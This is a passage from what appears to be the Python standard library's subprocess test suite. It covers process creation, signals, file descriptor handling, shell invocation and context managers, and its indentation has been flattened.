# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except RuntimeError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
# restore the original fd's underneath sys.stdin, etc.
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except RuntimeError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or RuntimeError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ascii for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(value))
# test bytes
key = key.encode("ascii", "surrogateescape")
value = value.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open("/dev/null", os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
"poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
subprocess._has_poll = False
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._has_poll = True
ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
HelperFunctionTests,
CommandsWithSpaces,
ContextManagerTests,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
base_consumer.py | # -*- coding: utf-8 -*-
